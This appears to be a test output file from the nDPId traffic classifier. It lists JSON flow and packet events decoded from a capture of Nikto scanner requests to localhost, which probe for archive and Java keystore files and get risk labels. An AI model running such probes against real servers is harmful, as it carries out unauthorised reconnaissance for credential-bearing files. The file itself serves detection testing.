+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 